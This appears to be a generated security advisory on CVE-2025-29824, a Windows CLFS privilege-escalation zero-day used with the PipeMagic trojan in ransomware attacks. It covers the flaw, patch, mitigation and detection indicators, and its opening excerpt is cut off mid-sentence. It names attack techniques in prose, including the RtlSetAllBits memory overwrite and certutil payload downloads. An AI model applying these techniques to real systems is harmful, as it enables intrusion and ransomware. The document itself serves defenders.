Full Report
Microsoft has revealed that a now-patched security flaw impacting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets. "The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in
Analysis Summary
# Vulnerability: Windows CLFS Zero-Day (CVE-2025-29824) Exploited by PipeMagic Trojan for Ransomware Deployment
## CVE Details
- CVE ID: CVE-2025-29824
- CVSS Score: Not explicitly specified, but described as a severe **privilege escalation bug** leading to SYSTEM privileges.
- CWE: Not explicitly specified in detail, but related to memory corruption within a kernel driver.
## Affected Systems
- Products: Microsoft Windows (specific versions not fully itemized, but generally affected versions prior to April 2025 Patch Tuesday).
- Versions: All versions confirmed to be vulnerable prior to the April 2025 patch. *Note: Windows 11 version 24H2 is explicitly noted as **not affected*** due to required `SeDebugPrivilege` restrictions on `NtQuerySystemInformation`.
- Configurations: Systems not updated via the April 2025 Patch Tuesday cycle.
## Vulnerability Description
CVE-2025-29824 is a zero-day vulnerability affecting the **Windows Common Log File System (CLFS) kernel driver**. Successful exploitation allows a local attacker to achieve **SYSTEM level privileges** through privilege escalation. The exploit reportedly targets a memory corruption issue within the CLFS driver and utilizes the `RtlSetAllBits` API to overwrite memory contents.
## Exploitation
- Status: **Exploited in the wild** (used in active ransomware attacks tracked as Storm-2460).
- Complexity: Implied to be manageable by sophisticated threat actors, as it was delivered via the multi-functional PipeMagic malware.
- Attack Vector: Implied **Local** post-initial compromise, as the vulnerability serves as a Privilege Escalation mechanism. Initial access was observed using `certutil` to fetch payloads from compromised third-party sites.
## Impact
- Confidentiality: High (SYSTEM access can lead to full data exfiltration).
- Integrity: High (SYSTEM access allows for modification or destruction of system data).
- Availability: High (Used to deploy ransomware, leading to service disruption).
## Remediation
### Patches
- Microsoft fixed this vulnerability as part of its **April 2025 Patch Tuesday update**. Users must apply the relevant update package for their operating system version.
### Workarounds
- No specific generic workarounds were detailed other than applying the patch.
- **Note on Configuration:** Restricting access to System Information Classes within `NtQuerySystemInformation` by ensuring non-administrative users do not have `SeDebugPrivilege` may serve as a mitigating factor on systems not yet patched (effective for preventing exploitation attempts on Windows 11 24H2).
## Detection
- **Indicators of compromise:** Execution of PipeMagic malware, often launched via a malicious MSBuild file containing an encrypted payload. Observation of suspicious activity stemming from the CLFS driver. Threat activity tracked under **Storm-2460**.
- **Detection methods and tools:** Monitoring for the initial stages of payload delivery, such as unusual network connections initiated by `certutil` downloading executables, and subsequent process execution from MSBuild scripts.
## References
- Vendor Advisory (Microsoft): hxxps://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/
- Related PipeMagic Analysis (Kaspersky/SecureList, referencing previous CVE): hxxps://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/